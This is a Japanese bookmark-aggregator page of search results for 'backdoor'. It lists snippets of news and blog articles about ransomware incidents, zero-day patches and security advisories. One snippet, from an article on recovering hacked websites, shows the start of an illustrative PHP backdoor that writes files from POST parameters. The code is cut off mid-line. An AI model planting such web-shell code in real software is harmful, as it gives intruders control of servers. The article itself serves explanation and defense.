並び順

ブックマーク数

期間指定

  • から
  • まで

161 - 200 件 / 246件

新着順 人気順

バックドアの検索結果161 - 200 件 / 246件

  • Apple、WebKitのゼロデイ脆弱性を修正した「Safari v16.4.1」をmacOS 11 Big SurとmacOS 12 Monterey向けにリリース。

    Safari v16.4.1のリリースノートは、まだSafari v16.4から変更されていませんが、Appleが公開したセキュリティコンテンツによると、Safari v16.4.1では、Google脅威分析チーム(TAG)のClément Lecigneさんと、Amnesty International’s Security LabのDonncha Ó Cearbhaillさんにより発見された、 Super proud of our team at @AmnestyTech and everyone who helped in this investigation. Today, Apple published an emergency update for all iPhones to patch an exploit chain which we, together with @_c

      Apple、WebKitのゼロデイ脆弱性を修正した「Safari v16.4.1」をmacOS 11 Big SurとmacOS 12 Monterey向けにリリース。
    • 何度でもよみがえる「ランサムウェア攻撃」、だから何度でも振り返ろう

      何度でもよみがえる「ランサムウェア攻撃」、だから何度でも振り返ろう:半径300メートルのIT(1/2 ページ) IPAがランサムウェアに関する注意喚起を発表しました。これを「またか」と思うのはちょっと危険です。有効な対策は日々変化しています。例えば「企業公式のSNSアカウントが企業と顧客を守る命綱になるかもしれない」としたら?

        何度でもよみがえる「ランサムウェア攻撃」、だから何度でも振り返ろう
      • ホンダのサイバー攻撃は「テレワークが標的」、専門家が指摘 | Forbes JAPAN 公式サイト(フォーブス ジャパン)

        自動車メーカーのホンダは6月8日、外部からのサイバー攻撃によって社内ネットワークに混乱が生じたことを明らかにした。同社の米国法人の公式ツイッターは、カスタマーサービスや金融サービスにも障害が発生したと述べている。 ツイッター上でmilkreamと名乗るセキュリティ研究者は、攻撃に用いられたランサムウェアがSNAKE(スネーク)、もしくはEkansと呼ばれるものであると指摘した。 テック系メディアBleeping ComputerがSNAKEの作成者に確認をとったところ、この人物はホンダの攻撃との関わりを肯定も否定もしなかった。「ターゲットに対し否定の機会を与えるために、攻撃の詳細に関しての情報共有は控える」と作成者は述べている。 ホンダは現在、一部の工場やカスタマーサービス及び金融サービスのオペレーションを一時的に停止している。同社はBBCに対し、攻撃を受けたことを認めた。 ニュースサイト

          ホンダのサイバー攻撃は「テレワークが標的」、専門家が指摘 | Forbes JAPAN 公式サイト(フォーブス ジャパン)
        • Business technology giant Konica Minolta hit by new ransomware

          HomeNewsSecurityBusiness technology giant Konica Minolta hit by new ransomware Business technology giant Konica Minolta was hit with a ransomware attack at the end of July that impacted services for almost a week, BleepingComputer has learned. Konica Minolta is a Japanese multinational business technology giant with almost 44,000 employees and over $9 billion in revenue for 2019. The company offer

            Business technology giant Konica Minolta hit by new ransomware
          • バックドアの実例と対応

            はじめに Webサイトのソースが改ざんされて、見れなくなった。 全然違うページが表示されている。 コードを修正してもすぐにまた改ざんされる。 ・・・といったご相談が相次いでおります。 Webサイトの何らかの脆弱性を突かれ、「バックドア」を設置された、というパターンです。 攻撃を受けたサイトのリカバリー対応は、本当に神経を使いますし、骨が折れます。 (そして何より生産的ではありません・・・) 折角なので、バックドアに対する理解を深めていただけると嬉しいなと思い、記事を書きました。 バックドアとはこんなもの 皆さん言葉は知っていると思いますが、 「バックドア」とは、ざっくり言うとこんなイメージのファイルです。 (詳細は後述しますが、これはあくまでイメージです。) <?php $path = __DIR__ . '/' . $_POST['path']; $content = $_POST['c

              バックドアの実例と対応
            • 半田病院ランサムウェア事件の経緯と教訓 ━ランサムウェアが本質ではない!?━|情報処理学会・学会誌「情報処理」

              森井昌克(神戸大学大学院工学研究科) 深夜,プリンタが勝手に動きだした! 四国でも山深い,徳島県の西部,四国のほぼ中央部に近いつるぎ町にある町立半田病院(図-1).しずまり返った10月末の土曜日深夜(2021年10月31日(日)午前0時30分頃),複数のプリンタから,誰が操作したでもなく,勝手に英語で書かれた印刷物が止めどもなく,用紙がなくなるまで出力される(図-2).ランサムウェアの感染である.この時点で病院内の誰もが事態の深刻さに気付かず,深夜ゆえに気味の悪さにとりつかれながらも,単にコンピュータおよび周辺機器の暴走と考えられた.しかしその後すぐに当直医師から電子カルテの異常が報告され,午前3時にはシステム担当者が緊急事態として駆け付け,すべてのサーバやネットワークを動作チェックした結果,ほとんどが機能せず,この時点(午前8時)で初めてランサムウェアに感染したことが判明した.その後ただ

                半田病院ランサムウェア事件の経緯と教訓 ━ランサムウェアが本質ではない!?━|情報処理学会・学会誌「情報処理」
              • ランサムウェア被害企業の76%が身代金支払い、約3分の1がデータの復元に失敗

                印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます ヴィーム・ソフトウェアは5月24日、ランサムウェア攻撃に関するグローバル調査「Veeam 2022 Ransomware Trends Report」を発表した。米国ラスベガスで開催されたプライベートイベント「VeeamON 2022」に合わせて17日付けで公表されたものになる。 執行役員社長の古舘正清氏は記者会見で、「事業継続計画(BCP)対策は、これまで地震などの自然災害に備えるものだったが、現在の最大の脅威はランサムウェアだ」とする声が最近顧客から聞かれると紹介。国内でもランサムウェア攻撃によって甚大な損害が発生した実例が増えていることを踏まえ、バックアップによるランサムウェア対策の重要性を強調した。 同社では以前から「3-2-1

                  ランサムウェア被害企業の76%が身代金支払い、約3分の1がデータの復元に失敗
                • 大阪の災害拠点病院にサイバー攻撃か 「仮想通貨を要求」 - 日本経済新聞

                  大阪府立病院機構が運営する大阪急性期・総合医療センター(大阪市住吉区)で31日午前に電子カルテを管理するシステムに大規模な障害が発生し、同センターは緊急以外の手術や外来診療などを停止したと発表した。「ランサムウエア(身代金要求型ウイルス)によるサイバー攻撃を受けたとみられる」としている。同日夜に記者会見し、復旧のめどは立たず、11月1日も診療の全面再開は難しいと説明した。センターによると、31

                    大阪の災害拠点病院にサイバー攻撃か 「仮想通貨を要求」 - 日本経済新聞
                  • WebPのゼロデイ脆弱性は「Teams」や「Skype」にも ~Microsoftが影響製品を公表【10月10日追記】/すでに修正版が公開中

                      WebPのゼロデイ脆弱性は「Teams」や「Skype」にも ~Microsoftが影響製品を公表【10月10日追記】/すでに修正版が公開中
                    • ランサムウェア攻撃の4割が「暗号化と暴露」型--巧妙化が進む2021年

                      印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます ランサムウェア攻撃は、企業や組織が特に警戒すべき脅威の1つになっている、チェック・ポイント・ソフトウェア・テクノロジーズが2021年のこれまでの状況を観測、分析した結果では、攻撃手法の巧妙化がより進んでいることが分かった。 まず2021年上半期(1~6月)の概況は、グローバルではサイバー攻撃が2020年に比べて29%増加した。また上半期の間に米国で17%、欧州・中東・アフリカで36%、アジア太平洋で13%それぞれ増加しているおり、9月末時点での日本状況は2020年比で71%増、上半期の間に153%増加した。 上半期に攻撃を受けた業種は、日本ではシステムインテグレーターやディストリビューターが週平均1186件と最も多く、ソフトウェアベンダ

                        ランサムウェア攻撃の4割が「暗号化と暴露」型--巧妙化が進む2021年
                      • システム障害じゃない!「犯行声明」で始まったランサムウェアの悪夢:朝日新聞デジタル

                        ","naka5":"<!-- BFF501 PC記事下(中⑤企画)パーツ=1541 -->","naka6":"<!-- BFF486 PC記事下(中⑥デジ編)パーツ=8826 --><!-- /news/esi/ichikiji/c6/default.htm -->","naka6Sp":"<!-- BFF3053 SP記事下(中⑥デジ編)パーツ=8826 -->","adcreative72":"<!-- BFF920 広告枠)ADCREATIVE-72 こんな特集も -->\n<!-- Ad BGN -->\n<!-- dfptag PC誘導枠5行 ★ここから -->\n<div class=\"p_infeed_list_wrapper\" id=\"p_infeed_list1\">\n <div class=\"p_infeed_list\">\n <div class=\"

                          システム障害じゃない!「犯行声明」で始まったランサムウェアの悪夢:朝日新聞デジタル
                        • サイバー犯罪グループがランサムウェア攻撃を週末に実行する理由とは?

                          近年、ランサムウェアによるサイバー攻撃が活発になっており、数多くの企業や公的機関が被害を受けています。そんな中、サイバー犯罪グループが「ランサムウェア攻撃を週末に行う傾向がある」ことが報じられています。 Why ransomware hackers love a holiday weekend | Ars Technica https://arstechnica.com/information-technology/2021/09/why-ransomware-hackers-love-a-holiday-weekend/ バイデン政権が緊急事態宣言を出したことで話題になったアメリカ最大の石油パイプライン・Colonial Pipelineへのランサムウェア攻撃は、2021年5月7日(金)に実行されました。また、世界最大の食肉業者・JBSは、翌日に戦没将兵追悼記念日を控えた2021年5月3

                            サイバー犯罪グループがランサムウェア攻撃を週末に実行する理由とは?
                          • ランサムウェアの被害を受けた大学とハッカーの間で行われた「身代金交渉」の様子とは?

                            感染したコンピューターのシステムを暗号化し、復旧するための解除キーと引き換えに身代金を要求するランサムウェアによる被害は、病院や自治体など幅広い企業や機関で確認されています。海外メディアのBloombergが、カリフォルニア大学サンフランシスコ校(UCSF)のサーバーをランサムウェアでロックしたハッカーと、UCSFが用意した「交渉人」との間で交わされた身代金交渉の様子を報じています。 UCSF Hack Shows Evolving Risks of Ransomware in the Covid Era - Bloomberg https://www.bloomberg.com/news/features/2020-08-19/ucsf-hack-shows-evolving-risks-of-ransomware-in-the-covid-era 2020年6月1日、UCSFの疫学およ

                              ランサムウェアの被害を受けた大学とハッカーの間で行われた「身代金交渉」の様子とは?
                            • 新しいランサムウェアの亜種「FiveHands」の攻撃確認、確認を

                              米コンピュータ緊急事態対策チーム(US-CERT: United States Computer Emergency Readiness Team)は5月6日(米国時間)、「CISA Releases Analysis Reports on New FiveHands Ransomware |CISA」において、「FiveHands」と呼ばれる新しいランサムウェアの亜種によるサイバー攻撃を確認したと伝えた。 US-CERTはこうした状況を受け、FiveHandsを使ったサイバーアクターの戦術、技術、手順、IoCの分析を行い、その結果を次の2つの分析レポートとして公開した。 FiveHands Ransomware | CISA FiveHands Ransomware | CISA MAR-10324784-1.v1: FiveHands Ransomware | CISA MAR-103

                                新しいランサムウェアの亜種「FiveHands」の攻撃確認、確認を
                              • ランサムウェア対策に「3-2-1-1-0」--ヴィームが推奨

                                印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます バックアップの「3-2-1ルール」に対し、Veeam Softwareが「3-2-1-1-0」を提唱している。ランサムウェア攻撃が増加する中で、企業はより強い保護ルールが必要という考えといい、鍵を握るのが、書き換えができない「不変コピー」になる。 同社は、ランサムウェアに関する技術資料「5 Ransomware Protection Best Practices」を発表。共同執筆した製品戦略担当シニアディレクターのRick Vanover氏が、ランサムウェア攻撃からの保護として同社の推奨する対処方法を説明した。 「業種や規模に関係なく、データがある企業は全て狙われている」(Vanover氏)というほどランサムウェア攻撃は身近な問題になっ

                                  ランサムウェア対策に「3-2-1-1-0」--ヴィームが推奨
                                • ランサムウェア攻撃で悪用された正規ツールを解説

                                  オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら

                                    ランサムウェア攻撃で悪用された正規ツールを解説
                                  • Emotetマルウェアからランサムウェアの被害に--IBMが日本企業に警鐘

                                    印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 米IBMのセキュリティ機関「X-Force」は、マルウェア「Emotet」を拡散する攻撃が日本企業を標的にしていることを確認したと発表した。Emotetの感染はランサムウェア「Ryuk」の攻撃に連鎖し、日本企業に警戒を呼び掛けている。 Emotetの拡散では、主になりすまし型のメールが使われ、添付ファイルや不正サイトへのリンクを通じて感染する。Emotetは、さまざまなサイバー攻撃活動を行うボットネットインフラを構成するための不正プログラムであり、Emotet感染後は別のトロイの木馬型マルウェア「TrickBot」などに感染し、さらに「Ryuk」などのランサムウェアに感染することが知られる。

                                      Emotetマルウェアからランサムウェアの被害に--IBMが日本企業に警鐘
                                    • 「コスタリカ政府を転覆させる」と脅迫するランサムウェア集団が政府ネットワークに侵入

                                      コスタリカ政府のコンピューターシステムの一部にランサムウェア攻撃を仕掛けた犯罪者集団が、政府に2000万ドル(約25億8000万円)を要求し、さらに「政府を転覆させる」と脅しをかけていることが明らかになりました。 Ransomware gang threatens to overthrow Costa Rica government | AP News https://apnews.com/article/technology-government-and-politics-caribbean-gangs-381efc2320abb5356dee7f356e55e608 コスタリカ政府のシステムに侵入したのは、これまでにもさまざまな組織に被害をもたらしてきたロシア産ランサムウェア「Conti」です。攻撃者は2022年4月頃にコスタリカ政府の一部システムへContiを送り込み、税関や税金の徴

                                        「コスタリカ政府を転覆させる」と脅迫するランサムウェア集団が政府ネットワークに侵入
                                      • インフラを狙うロシアのハッカー集団のウェブサイトが謎の消失

                                        マルウェアでコンピューターの制御を奪い、身代金を要求するランサムウェア攻撃の被害が、アメリカのインフラ企業で増加しています。攻撃を行ったとみられるのがロシアのハッカー集団だったことから、バイデン大統領は2021年6月16日の会談でプーチン大統領に対してサイバー攻撃に関する提案を行いました。そして7月13日付けで、問題となっていたロシアのハッカー集団のウェブサイトが消失したことが報じられています。 REvil, Hacking Group Behind Major Ransomware Attack, Disappears - The New York Times https://www.nytimes.com/2021/07/13/us/politics/russia-hacking-ransomware-revil.html REvil ransomware gang inexplica

                                          インフラを狙うロシアのハッカー集団のウェブサイトが謎の消失
                                        • ランサムウェア攻撃事案から見る、ファーストレスポンダー同士の情報共有が必要な理由 - JPCERT/CC Eyes

                                          はじめに 先日、経済産業省から「攻撃技術情報の取扱い・活用手引き」が公開[1]されました。これはインシデント対応支援にあたるファーストレスポンダー(※)や専門組織同士の情報共有を促進するためのレファレンスで、JPCERT/CCは検討会共同事務局として参加し、また、手引き案の作成にも携わりました。 (※)ファーストレスポンダー:インシデントの初動対応にあたる、被害組織を支援するセキュリティベンダーや運用保守ベンダー、その他専門機関などのこと(「攻撃技術情報の取扱い・活用手引き」15ページ参照) サイバー攻撃の高度化・複雑化だけでなく、ランサムウェア攻撃のように、インシデント初動対応時点では、ごく限られた情報で速やかな対応判断が必要になるケースが増えています。2024年1月に開催されたJSAC2024において、JPCERT/CC 佐々木からは「ランサムウェア攻撃のアクター特定をすべきこれだけの

                                            ランサムウェア攻撃事案から見る、ファーストレスポンダー同士の情報共有が必要な理由 - JPCERT/CC Eyes
                                          • Apple、3月のアップデートでは未修正だったゼロデイ脆弱性を修正した「macOS Big Sur 11.6.6」と「macOS Catalinaセキュリティアップデート2022-004」をリリース。

                                            Appleが3月のアップデートでは未修正だったゼロデイ脆弱性を修正した「macOS Big Sur 11.6.6」と「macOS Catalinaセキュリティアップデート2022-004」をリリースしています。詳細は以下から。 Appleは現地時間2022年05月16日、IntelやApple Silicon向けに「macOS 12.4 Monterey」を正式にリリースしましたが、同時に、現在もセキュリティサポートを続けているmacOS 11 Big SurとmacOS 10.15 Catalina向けに「macOS Big Sur 11.6.6」と「macOS Catalinaセキュリティアップデート2022-004」を公開しています。 このアップデートをすべてのユーザに推奨します。このアップデートを適用するとmacOSのセキュリティが向上します。 リリースノートより Appleが同時

                                              Apple、3月のアップデートでは未修正だったゼロデイ脆弱性を修正した「macOS Big Sur 11.6.6」と「macOS Catalinaセキュリティアップデート2022-004」をリリース。
                                            • 最近のサイバー攻撃の状況を踏まえ、経営者の皆様へサイバーセキュリティの取組の強化に関する注意喚起を行います (METI/経済産業省)

                                              経済産業省は、サイバー攻撃の起点の拡大や烈度の増大が続いていることを受け、最近の攻撃の特徴と目的を明らかにし、企業やその関係機関等が対応する際に注意すべき点を整理することで、企業の経営者の方々に対し、サイバーセキュリティの取組の一層の強化を促すこととしました。 1.趣旨 (1)中小企業を巻き込んだサプライチェーン上での攻撃パターンの急激な拡がり 昨今、中小企業を含む取引先や海外展開を進める企業の海外拠点、さらには新型コロナウイルスの感染拡大に伴うテレワークの増加に起因する隙など、攻撃者が利用するサプライチェーン上の「攻撃起点」がますます拡大しています。 (2)大企業・中小企業等を問わないランサムウェアによる被害の急増 暗号化したデータを復旧するための身代金の要求に加えて、暗号化する前にあらかじめデータを窃取しておき、身代金を支払わなければデータを公開するなどと脅迫する、いわゆる「二重の脅迫

                                              • 2021年第3四半期におけるランサムウェアの脅威動向を分析

                                                オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら

                                                  2021年第3四半期におけるランサムウェアの脅威動向を分析
                                                • デンソーに「身代金」サイバー攻撃、破られたシステム 「影響ない」:朝日新聞デジタル

                                                  ","naka5":"<!-- BFF501 PC記事下(中⑤企画)パーツ=1541 --><!--株価検索 中⑤企画-->","naka6":"<!-- BFF486 PC記事下(中⑥デジ編)パーツ=8826 --><!-- /news/esi/ichikiji/c6/default.htm -->","naka6Sp":"<!-- BFF3053 SP記事下(中⑥デジ編)パーツ=8826 -->","adcreative72":"<!-- BFF920 広告枠)ADCREATIVE-72 こんな特集も -->\n<!-- Ad BGN -->\n<!-- dfptag PC誘導枠5行 ★ここから -->\n<div class=\"p_infeed_list_wrapper\" id=\"p_infeed_list1\">\n <div class=\"p_infeed_list\">

                                                    デンソーに「身代金」サイバー攻撃、破られたシステム 「影響ない」:朝日新聞デジタル
                                                  • 戦略的に調整されたLinux特化型ランサムウェアが急増 「これは検出が難しい」、その理由とは

                                                    戦略的に調整されたLinux特化型ランサムウェアが急増 「これは検出が難しい」、その理由とは:チェック・ポイントがランサムウェア攻撃に関する調査結果を発表 チェック・ポイント・リサーチは、「Linux」と「Windows」に対するランサムウェア攻撃の調査結果を発表した。Linux特化型ランサムウェアは、中、大規模組織向けに戦略的に調整され、システムの破損を防ぐために重要なディレクトリを避けるなど巧妙に作られているという。

                                                      戦略的に調整されたLinux特化型ランサムウェアが急増 「これは検出が難しい」、その理由とは
                                                    • 慌てた様子の男性、セブンへ「PCがウイルス感染」…女性店員「警察に相談を」

                                                      【読売新聞】 ニセ電話詐欺被害を未然に防いだとして、佐賀県警鳥栖署は、鳥栖市のコンビニ店「セブン―イレブン」従業員の女性2人に感謝状を贈った。 同署などによると、2人は3月17日、慌てた様子で来店した男性客(50歳代)が「パソコンが

                                                        慌てた様子の男性、セブンへ「PCがウイルス感染」…女性店員「警察に相談を」
                                                      • サイバー恐喝に屈しない日本 試される「人質」奪還能力 - 日本経済新聞

                                                        ランサムウエア(身代金要求型ウイルス)の被害を受けても日本企業の大半は身代金の支払いを拒否する。その決然とした姿勢は、世界でも有数であることが調査から分かった。日本企業の強気のスタンスはテロ組織に対して強硬な態度で対応する米政府にも通じるものがある。ただ徹底的に訓練された特殊部隊などを駆使して「人質」を奪還する米政府のテロ対策と比べると、その救出能力には雲泥の差がある。米海軍特殊部隊SEALS(

                                                          サイバー恐喝に屈しない日本 試される「人質」奪還能力 - 日本経済新聞
                                                        • セキュリティが脆弱なVPNサーバーを狙う「Daixin Team」の攻撃が活発化--FBIが警告

                                                          印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 米連邦捜査局(FBI)と米サイバーセキュリティ・インフラセキュリティ庁(CISA)、米保健福祉省(HHS)は米国時間10月21日、「Daixin Team」によるヘルスケア事業者に対するランサムウェアやデータ窃取/恐喝といった攻撃が増加しているとして警告を発した。 これらの機関が共同で発表した今回のアドバイザリーは、2022年6月以降に発生している、ヘルスケアおよび公衆衛生(HPH)セクターに対するDaixin Teamのアクティビティーに関するものだ。 Daixin Teamはランサムウェアを用い、電子健康記録(EHR)や診断、画像、イントラネット関連のサービスを担うサーバーを暗号化している。また、個人を特定できる情報(PII)や、患

                                                            セキュリティが脆弱なVPNサーバーを狙う「Daixin Team」の攻撃が活発化--FBIが警告
                                                          • ランサムウェアは「最も差し迫った脅威」--英サイバーセキュリティー責任者が警鐘

                                                            印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます ランサムウェアは、国の重要インフラを提供する組織や大企業から、学校や地場企業に至るまで、幅広い組織にとってサイバーセキュリティ上の脅威になっている。しかしこれは、対抗できる脅威でもあるという。 英国のサイバーセキュリティ政策を統括する機関である国家サイバーセキュリティセンター(NCSC)の最高責任者であるLindy Cameron氏は、現地時間10月11日に英王立国際問題研究所が開催したカンファレンス「Cyber 2021」で行った講演で、今世界が直面しているサイバセキュリティ上の脅威について語った。そこで扱った内容には、サプライチェーン攻撃や、敵対的な国家によるサイバー諜報やサイバー攻撃、エクスプロイトや脆弱性が誰にでも販売されている

                                                              ランサムウェアは「最も差し迫った脅威」--英サイバーセキュリティー責任者が警鐘
                                                            • ランサムウェアに対する身代金支払いがアメリカで「税控除」の対象になる可能性

                                                              システムへのアクセスを強制的に制限して身代金を要求する「ランサムウェア」を用いたサイバー攻撃が近年増加の一途をたどっており、アメリカ最大の石油パイプラインColonial Pipelineや、世界最大の食肉加工業JBSなどが被害を受けています。こうしたランサムウェアの増加を受け、アメリカでは「ランサムウェア攻撃に対する身代金支払いが税控除の対象になる可能性がある」と報じられています。 Hit by a ransomware attack? Your payment may be deductible https://apnews.com/article/technology-business-government-and-politics-d8c1e9958ad1e89eab83f44e6ca70a94 The Cybersecurity 202: Legal scholars are w

                                                                ランサムウェアに対する身代金支払いがアメリカで「税控除」の対象になる可能性
                                                              • フィッシングによる不正送金被害が過去最多 金融庁と警察庁が注意喚起

                                                                金融庁と警察庁は12月25日、フィッシングとみられる手口によってネットバンキングのIDとパスワードが盗まれ、預金を不正に送金される被害が広がっているとして連名で注意喚起した。2023年は11月末時点で被害件数が5147で、被害額は約80億1000万円と、いずれも過去最多を更新している。 SMS(ショートメッセージ)やメールなどで実在する金融機関の名前を騙り、フィッシングサイト(偽サイト)へ誘導してIDやパスワードなどを入力させるのが主な手口。年末年始は特に3大メガバンクを騙るフィッシングに注意が必要としている。 被害に遭わないための心構えとして、1)心当たりのないSMSなどは開かない、2)ネットバンキングの利用状況を通知する機能を有効にして不審な取引に注意する、3)金融機関のWebサイトにアクセスする際は、事前に正しいURLをブックマークに登録しておき、そこからアクセスするか、金融機関の公

                                                                  フィッシングによる不正送金被害が過去最多 金融庁と警察庁が注意喚起
                                                                • 当社グループ会社に対するサイバー攻撃の調査結果と再発防止策について

                                                                  塩野義製薬株式会社の100%子会社である台湾塩野義製薬(本社:台北市、以下「台湾塩野義」)が2020年10月21日に外部からのサイバー攻撃を受け、一部の情報流出が確認されました。これまでの経緯につきまして、以下の通りご報告いたします。 ■サイバー攻撃の被害範囲および復旧対応について 外部のサイバーセキュリティ専門家による調査を実施した結果、台湾塩野義が保有するサーバー・PCにランサムウェアの一種と推測されるマルウェアの攻撃痕跡を確認いたしました。 当社グループでは、外部の専門家による確認ののち、安全対策に万全を期し、特別な監視体制を敷いたうえで台湾塩野義のシステムを全面的に復旧いたしました。 また、当社グループの日本・米国における拠点への影響につきましても通信ログおよびシステムのログの確認を行いましたが不正アクセスの痕跡は発見されず、当社グループのその他地域への不正なアクセスはなかったと判

                                                                  • CISA、FBI、NSAがBlackMatterランサムウェア対策アドバイザリー公開

                                                                    米国土安全保障省のサイバーセキュリティインフラセキュリティ庁(CISA)、米連邦捜査局(FBI)、米国家安全保障局(NSA)は10月18日(現地時間)、今夏発生した複数の米国のインフラを標的とするBlackMatterランサムウェア攻撃に関するサイバーセキュリティアドバイザリを公開した。 このアドバイザリは、サンドボックス環境で分析したBlackMatterランサムウェアのデータと、信頼できるサードパーティーからの報告に基づいてまとめた犯罪者の戦術、技術、攻撃手順に関する情報を提供するものだ。 「われわれはサイバー犯罪者の活動を困難にするために可能な限りの措置を講じている。米国民はStopransomware.govにアクセスしてリスク軽減方法を学ぶことで、この取り組みを支援できる」とCISAのエリック・ゴールドスタイン氏が語った。 発表文では具体的な被害者名は挙げていないが「7月に初めて

                                                                      CISA、FBI、NSAがBlackMatterランサムウェア対策アドバイザリー公開
                                                                    • 4年も開いてたバックドア。ロシアのiPhone数千台を襲った史上最恐ハック

                                                                      4年も開いてたバックドア。ロシアのiPhone数千台を襲った史上最恐ハック2024.01.12 07:009,003 Maxwell Zeff - Gizmodo US [原文] ( satomi ) モスクワのセキュリティ会社カスペルスキーもやられてたというから本物です。 何者かがロシアの外交官やカスペルスキー研究員のiPhoneにバックドア(裏口=相手のコンピューターに侵入できるように不正に開けられた入口)から侵入し、過去4年間に渡って持ち主の行動をつぶさに監視していたことが、カスペルスキーの調べでわかりました。 だれも知らないはずのゼロデイ攻撃(開発側が対策する前に行なわれるハッキング攻撃)の脆弱性を突いた攻撃で、「こんな巧妙なハックは見たことない」と同社も舌を巻いています。 脆弱性は修正済みですが怖いですよね。同社はさっそく「Operation Triangulation」と命名し

                                                                        4年も開いてたバックドア。ロシアのiPhone数千台を襲った史上最恐ハック
                                                                      • ランサムウェア「LockBit 2.0」が拡大中、2021年7月8月のマルウェアレポート

                                                                        2021年7月と8月にESET製品が日本国内で検出したマルウェアの概要についてご紹介しています。7月と8月は、ランサムウェアLockBit 2.0による被害を確認しています。 7月と8月の概況 2021年7月(7月1日~7月31日)と8月(8月1日~8月31日)にESET製品が国内で検出したマルウェアの検出数の推移は、以下のとおりです。 国内マルウェア検出数*1の推移 (2021年3月の全検出数を100%として比較) *1 検出数にはPUA(Potentially Unwanted/Unsafe Application:必ずしも悪意があるとは限らないが、コンピューターのパフォーマンスに悪影響を及ぼす可能性があるアプリケーション)を含めています。

                                                                          ランサムウェア「LockBit 2.0」が拡大中、2021年7月8月のマルウェアレポート
                                                                        • なぜ被害が減らない? ランサムウェアの最新動向と企業にありがちな“2つの盲点”

                                                                          ランサムウェア被害がニュースで連日報道される昨今、日々進化するサイバー脅威に対してどのような事前対策または事後対策をすればいいか分からないという企業は多くなっているのではないだろうか。 パロアルトネットワークスの林 薫氏(日本担当最高セキュリティ責任者)がランサムウェア攻撃の最新動向を踏まえつつ、日本企業のセキュリティ対策が抱える盲点とやるべきことを語った。 サイバー攻撃者の標的にされやすい業界とは? 林氏ははじめにパロアルトネットワークスが2023年4月に発表した「ランサムウェア脅威レポート 2023」からサイバー攻撃手法のトレンドや狙われている業界といった最新動向を明らかにした。 このレポートは2021年5月~2022年10月の間に同社のグローバル脅威インテリジェンスチーム「Unit 42」が対応した約1000件の事例とダークWebのリークサイトを分析し、日々の業務から得られた知見に基

                                                                            なぜ被害が減らない? ランサムウェアの最新動向と企業にありがちな“2つの盲点”
                                                                          • 筆者が気になる2024年のセキュリティトピック AIやランサムウェアは今後どうなる?

                                                                            2024年が始まりました、本年もよろしくお願いします。今日から本格的に働き始める方は気を引き締めていきましょう。 ITセキュリティの世界では2023年も大変なことが多く起きました。もはやあらゆる日本企業が“有事”となっているという実感が個人的にはあります。 2023年末には、多くのセキュリティ企業が2024年の予測を公開していました。セキュリティに関する動向はどうしても悲観的にならざるを得ませんが、こういった予測を基に事前に対策を講じることが2024年の安全を確保するための第一歩となると信じています。今回は独断と偏見で、その一部をピックアップしたいと思います。 2024年、ランサムウェアの新たな動きは 各社の予測をピックアップ ランサムウェアについては、どの予測でも必ず触れられているものの、予測するまでもなく消えることはない事柄のためか、さほど大きなトピックになっていません。興味深かったの

                                                                              筆者が気になる2024年のセキュリティトピック AIやランサムウェアは今後どうなる?
                                                                            • WannaCry拡散に利用された脆弱性を狙う攻撃が過去最大に--キヤノンMJ

                                                                              印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます キヤノンマーケティングジャパン(CMJ)は9月20日、2019年上半期の国内マルウェア動向報告書を公開した。2017年5月に流行したワーム型ランサムウェア「WannaCry」の拡散に利用されたWindowsの脆弱性を狙う攻撃の検出が拡散当時を上回る状況になっているという。 WannaCryは、WindowsのServer Message Blockの古いプロトコルに存在した脆弱性「MS17-010」を突く手法「EternalBlue」を悪用して拡散した。全世界で数十万台のコンピューターが感染してシステムダウンや身代金搾取などの深刻な被害が発生した。この拡散手法の有効性が知られるところになり、その後に出現したマルウェアの多くがEterna

                                                                                WannaCry拡散に利用された脆弱性を狙う攻撃が過去最大に--キヤノンMJ
                                                                              • 当JAが管理運用するサーバへの不正アクセスに関するお知らせ(第二報) 個人情報流出可能性のお知らせとお詫び / 新着情報|20221028|JA大潟村|大潟村農業協同組合|

                                                                                <<一覧に戻る 当JAが管理運用するサーバへの不正アクセスに関するお知らせ(第二報) 個人情報流出可能性のお知らせとお詫び 日頃よりJA事業においては、ご理解とご協力をいただき誠にありがとうございます。 9月16日に当JAホームページにて「JAシステムへの不正アクセスによる個人情報流出の可能性」について公表しておりますが、このたび、当JAが管理運用するサーバが、第三者により不正アクセス(ランサムウェアによるサイバー攻撃およびデータの暗号化)を受け、組合員・利用者の皆様等の個人情報が流出した可能性があることが判明いたしました。なお、現時点で、本件に関わる個人情報の不正利用等は確認されておりません。 組合員・利用者の皆様ならびにお取引先様、関係者の皆様には、多大なご迷惑とご心配をおかけいたしますこと深くお詫び申しあげます。 1 発生時の対応 当JAが管理運用するサーバが、第三者による不正アクセ

                                                                                • エピソード - 時論公論

                                                                                  後半国会の最大の焦点となる政治資金規正法の改正をめぐる議論などをもとに、“抜け道”のない実効性のある改正が実現されるのか考えます。

                                                                                    エピソード - 時論公論

                                                                                  新着記事